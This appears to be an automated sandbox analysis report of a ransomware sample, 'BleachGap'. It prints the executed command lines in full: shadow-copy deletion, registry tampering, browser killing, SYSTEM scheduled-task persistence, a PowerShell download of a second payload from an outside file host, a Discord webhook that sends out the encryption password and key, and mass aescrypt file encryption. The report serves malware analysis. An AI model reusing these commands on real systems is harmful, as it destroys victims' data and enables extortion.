WMIC.exevssvc.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeexplorer.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	944	WMIC.exe
Token: SeSecurityPrivilege	944	WMIC.exe
Token: SeTakeOwnershipPrivilege	944	WMIC.exe
Token: SeLoadDriverPrivilege	944	WMIC.exe
Token: SeSystemProfilePrivilege	944	WMIC.exe
Token: SeSystemtimePrivilege	944	WMIC.exe
Token: SeProfSingleProcessPrivilege	944	WMIC.exe
Token: SeIncBasePriorityPrivilege	944	WMIC.exe
Token: SeCreatePagefilePrivilege	944	WMIC.exe
Token: SeBackupPrivilege	944	WMIC.exe
Token: SeRestorePrivilege	944	WMIC.exe
Token: SeShutdownPrivilege	944	WMIC.exe
Token: SeDebugPrivilege	944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	944	WMIC.exe
Token: SeRemoteShutdownPrivilege	944	WMIC.exe
Token: SeUndockPrivilege	944	WMIC.exe
Token: SeManageVolumePrivilege	944	WMIC.exe
Token: 33	944	WMIC.exe
Token: 34	944	WMIC.exe
Token: 35	944	WMIC.exe
Token: 36	944	WMIC.exe
Token: SeIncreaseQuotaPrivilege	944	WMIC.exe
Token: SeSecurityPrivilege	944	WMIC.exe
Token: SeTakeOwnershipPrivilege	944	WMIC.exe
Token: SeLoadDriverPrivilege	944	WMIC.exe
Token: SeSystemProfilePrivilege	944	WMIC.exe
Token: SeSystemtimePrivilege	944	WMIC.exe
Token: SeProfSingleProcessPrivilege	944	WMIC.exe
Token: SeIncBasePriorityPrivilege	944	WMIC.exe
Token: SeCreatePagefilePrivilege	944	WMIC.exe
Token: SeBackupPrivilege	944	WMIC.exe
Token: SeRestorePrivilege	944	WMIC.exe
Token: SeShutdownPrivilege	944	WMIC.exe
Token: SeDebugPrivilege	944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	944	WMIC.exe
Token: SeRemoteShutdownPrivilege	944	WMIC.exe
Token: SeUndockPrivilege	944	WMIC.exe
Token: SeManageVolumePrivilege	944	WMIC.exe
Token: 33	944	WMIC.exe
Token: 34	944	WMIC.exe
Token: 35	944	WMIC.exe
Token: 36	944	WMIC.exe
Token: SeBackupPrivilege	1056	vssvc.exe
Token: SeRestorePrivilege	1056	vssvc.exe
Token: SeAuditPrivilege	1056	vssvc.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	388	taskkill.exe
Token: SeDebugPrivilege	3884	taskkill.exe
Token: SeDebugPrivilege	2272	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	184	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeShutdownPrivilege	5088	explorer.exe
Token: SeCreatePagefilePrivilege	5088	explorer.exe
Token: SeShutdownPrivilege	5088	explorer.exe
Token: SeCreatePagefilePrivilege	5088	explorer.exe
Token: SeShutdownPrivilege	5088	explorer.exe
Token: SeCreatePagefilePrivilege	5088	explorer.exe
Token: SeShutdownPrivilege	5088	explorer.exe
Token: SeCreatePagefilePrivilege	5088	explorer.exe

Suspicious use of FindShellTrayWindow 52 IoCs

Processes:

DiscordSendWebhook.exeDiscordSendWebhook.exeexplorer.exe

pid	process
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe

Suspicious use of SendNotifyMessage 31 IoCs

Processes:

DiscordSendWebhook.exeDiscordSendWebhook.exeexplorer.exe

pid	process
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2488	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe
5088	explorer.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

SearchUI.exeShellExperienceHost.exe

pid process

4968 SearchUI.exe
3404 ShellExperienceHost.exe
3404 ShellExperienceHost.exe

pid	process
4968	SearchUI.exe
3404	ShellExperienceHost.exe
3404	ShellExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

BleachGap.bin.execmd.exe

description	pid	process	target process
PID 1052 wrote to memory of 616	1052	BleachGap.bin.exe	cmd.exe
PID 1052 wrote to memory of 616	1052	BleachGap.bin.exe	cmd.exe
PID 616 wrote to memory of 944	616	cmd.exe	WMIC.exe
PID 616 wrote to memory of 944	616	cmd.exe	WMIC.exe
PID 616 wrote to memory of 1128	616	cmd.exe	vssadmin.exe
PID 616 wrote to memory of 1128	616	cmd.exe	vssadmin.exe
PID 616 wrote to memory of 3108	616	cmd.exe	reg.exe
PID 616 wrote to memory of 3108	616	cmd.exe	reg.exe
PID 616 wrote to memory of 2052	616	cmd.exe	reg.exe
PID 616 wrote to memory of 2052	616	cmd.exe	reg.exe
PID 616 wrote to memory of 516	616	cmd.exe	reg.exe
PID 616 wrote to memory of 516	616	cmd.exe	reg.exe
PID 616 wrote to memory of 740	616	cmd.exe	reg.exe
PID 616 wrote to memory of 740	616	cmd.exe	reg.exe
PID 616 wrote to memory of 640	616	cmd.exe	reg.exe
PID 616 wrote to memory of 640	616	cmd.exe	reg.exe
PID 616 wrote to memory of 3860	616	cmd.exe	reg.exe
PID 616 wrote to memory of 3860	616	cmd.exe	reg.exe
PID 616 wrote to memory of 2208	616	cmd.exe	attrib.exe
PID 616 wrote to memory of 2208	616	cmd.exe	attrib.exe
PID 616 wrote to memory of 2360	616	cmd.exe	attrib.exe
PID 616 wrote to memory of 2360	616	cmd.exe	attrib.exe
PID 616 wrote to memory of 584	616	cmd.exe	attrib.exe
PID 616 wrote to memory of 584	616	cmd.exe	attrib.exe
PID 616 wrote to memory of 2488	616	cmd.exe	DiscordSendWebhook.exe
PID 616 wrote to memory of 2488	616	cmd.exe	DiscordSendWebhook.exe
PID 616 wrote to memory of 2488	616	cmd.exe	DiscordSendWebhook.exe
PID 616 wrote to memory of 1372	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 1372	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 388	616	cmd.exe	taskkill.exe
PID 616 wrote to memory of 388	616	cmd.exe	taskkill.exe
PID 616 wrote to memory of 3884	616	cmd.exe	taskkill.exe
PID 616 wrote to memory of 3884	616	cmd.exe	taskkill.exe
PID 616 wrote to memory of 2272	616	cmd.exe	taskkill.exe
PID 616 wrote to memory of 2272	616	cmd.exe	taskkill.exe
PID 616 wrote to memory of 2820	616	cmd.exe	taskkill.exe
PID 616 wrote to memory of 2820	616	cmd.exe	taskkill.exe
PID 616 wrote to memory of 252	616	cmd.exe	schtasks.exe
PID 616 wrote to memory of 252	616	cmd.exe	schtasks.exe
PID 616 wrote to memory of 2492	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 2492	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 640	616	cmd.exe	schtasks.exe
PID 616 wrote to memory of 640	616	cmd.exe	schtasks.exe
PID 616 wrote to memory of 2348	616	cmd.exe	DiscordSendWebhook.exe
PID 616 wrote to memory of 2348	616	cmd.exe	DiscordSendWebhook.exe
PID 616 wrote to memory of 2348	616	cmd.exe	DiscordSendWebhook.exe
PID 616 wrote to memory of 2704	616	cmd.exe	attrib.exe
PID 616 wrote to memory of 2704	616	cmd.exe	attrib.exe
PID 616 wrote to memory of 1748	616	cmd.exe	cmd.exe
PID 616 wrote to memory of 1748	616	cmd.exe	cmd.exe
PID 616 wrote to memory of 252	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 252	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 252	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 1136	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 1136	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 1136	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 3876	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 3876	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 3876	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 1456	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 1456	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 1456	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 2136	616	cmd.exe	aescrypt.exe
PID 616 wrote to memory of 2136	616	cmd.exe	aescrypt.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

2208 attrib.exe
2360 attrib.exe
584 attrib.exe
2704 attrib.exe

pid	process
2208	attrib.exe
2360	attrib.exe
584	attrib.exe
2704	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe
"C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1052

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\42AC.tmp\42BD.tmp\42BE.bat C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe"
2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:616

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1128

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
3⤵
PID:3108

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
3⤵
PID:2052

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
3⤵
PID:516

C:\Windows\system32\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
3⤵
PID:740

C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
3⤵
PID:640

C:\Windows\system32\reg.exe
REG ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f
3⤵
PID:3860

C:\Windows\system32\attrib.exe
attrib +r +s +h +a +i C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe
3⤵
- Views/modifies file attributes
PID:2208

C:\Windows\system32\attrib.exe
attrib +r +a +s +h +i "C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe"
3⤵
- Views/modifies file attributes
PID:2360

C:\Windows\system32\attrib.exe
attrib +r +a +s +h +i "C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook.exe"
3⤵
- Views/modifies file attributes
PID:584

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook.exe
"C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook" -m ":writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start -verb runas cmd.exe /ArgumentList "/c kill.bat" /filepath "C:\Users\Admin\AppData\Local\Temp" /WindowStyle hidden
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\system32\taskkill.exe
taskkill /f /im opera.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:388

C:\Windows\system32\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3884

C:\Windows\system32\taskkill.exe
taskkill /f /im firefox.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2272

C:\Windows\system32\taskkill.exe
taskkill /f /im iexplore.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2820

C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe" /RU "SYSTEM" /f
3⤵
- Creates scheduled task(s)
PID:252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe','C:\Users\Admin\AppData\Local\Temp\final.exe')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492

C:\Windows\system32\schtasks.exe
schtasks /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\final.exe" /RU "SYSTEM" /MO 5
3⤵
- Creates scheduled task(s)
PID:640

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook.exe
"C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook" -m ":satellite: New Crypt from Admin, Password: Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU, FakeAccount: swHWbEhzjhKISUfERxC9KXLJAr2FTcjA3X, PersonalKey:||Iox5tI9PR14tJFSXpVmVx4JrHUQaBJCKSP50SPLNUjNsOTCU||" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2348

C:\Windows\system32\attrib.exe
attrib +r +a +s +h +i C:\Users\Admin\AppData\Local\Temp /s /D
3⤵
- Views/modifies file attributes
PID:2704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1748

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
3⤵
- Executes dropped EXE
PID:252

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SubmitClose.midi.lck" "SubmitClose.midi"
3⤵
- Executes dropped EXE
PID:1136

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AddDismount.crw.lck" "AddDismount.crw"
3⤵
- Executes dropped EXE
PID:3876

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExitSend.svgz.lck" "ExitSend.svgz"
3⤵
- Executes dropped EXE
PID:1456

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OpenJoin.contact.lck" "OpenJoin.contact"
3⤵
- Executes dropped EXE
PID:2136

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ConfirmRegister.mpeg.lck" "ConfirmRegister.mpeg"
3⤵
- Executes dropped EXE
PID:2116

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InitializeEnable.bin.lck" "InitializeEnable.bin"
3⤵
- Executes dropped EXE
PID:3012

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExportSave.pptx.lck" "ExportSave.pptx"
3⤵
- Executes dropped EXE
PID:2552

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AddUse.lnk.lck" "AddUse.lnk"
3⤵
- Executes dropped EXE
PID:3152

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CheckpointExit.mpe.lck" "CheckpointExit.mpe"
3⤵
- Executes dropped EXE
PID:3860

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DebugSend.wdp.lck" "DebugSend.wdp"
3⤵
- Executes dropped EXE
PID:2004

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PopCompress.midi.lck" "PopCompress.midi"
3⤵
- Executes dropped EXE
PID:3660

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "FindSet.ttc.lck" "FindSet.ttc"
3⤵
- Executes dropped EXE
PID:3204

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "UpdateDisable.ps1.lck" "UpdateDisable.ps1"
3⤵
- Executes dropped EXE
PID:2816

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StepGroup.ex_.lck" "StepGroup.ex_"
3⤵
- Executes dropped EXE
PID:2672

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InvokeInitialize.xht.lck" "InvokeInitialize.xht"
3⤵
- Executes dropped EXE
PID:3768

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RestartReset.3gp.lck" "RestartReset.3gp"
3⤵
- Executes dropped EXE
PID:1340

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeAssert.wma.lck" "ResumeAssert.wma"
3⤵
- Executes dropped EXE
PID:8

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RestoreLimit.nfo.lck" "RestoreLimit.nfo"
3⤵
- Executes dropped EXE
PID:1372

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DisconnectFormat.exe.lck" "DisconnectFormat.exe"
3⤵
- Executes dropped EXE
PID:388

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BlockTrace.asx.lck" "BlockTrace.asx"
3⤵
- Executes dropped EXE
PID:3884

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EnterRead.midi.lck" "EnterRead.midi"
3⤵
- Executes dropped EXE
PID:2996

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MountJoin.WTV.lck" "MountJoin.WTV"
3⤵
- Executes dropped EXE
PID:2276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:1932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:184

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:2212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe start-process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/k","call","C:\Users\Admin\AppData\Local\Temp\p2d.bat" -WorkingDirectory "C:\Users\Admin\Desktop" -WindowStyle hidden
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k call C:\Users\Admin\AppData\Local\Temp\p2d.bat
4⤵
- Modifies registry class
PID:2284

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt
5⤵
- Opens file in notepad (likely ransom note)
PID:5668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2696

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
3⤵
- Executes dropped EXE
PID:1912

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck" "These.docx"
3⤵
- Executes dropped EXE
PID:2120

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck" "Are.docx"
3⤵
- Executes dropped EXE
PID:2128

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck" "Recently.docx"
3⤵
- Executes dropped EXE
PID:1124

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck" "Opened.docx"
3⤵
- Executes dropped EXE
PID:3052

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck" "Files.docx"
3⤵
- Executes dropped EXE
PID:2704

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck" "LimitBackup.mpp"
3⤵
- Executes dropped EXE
PID:2392

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck" "TraceSave.xlsm"
3⤵
- Executes dropped EXE
PID:584

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck" "TestOptimize.ppsx"
3⤵
- Executes dropped EXE
PID:3820

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck" "NewMeasure.vstx"
3⤵
- Executes dropped EXE
PID:1832

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck" "AssertDebug.xlsm"
3⤵
- Executes dropped EXE
PID:2504

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck" "ExpandConfirm.dotx"
3⤵
- Executes dropped EXE
PID:2240

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck" "StartProtect.wps"
3⤵
- Executes dropped EXE
PID:3492

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck" "RenameCompare.mpp"
3⤵
- Executes dropped EXE
PID:260

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck" "StartInitialize.pub"
3⤵
- Executes dropped EXE
PID:1224

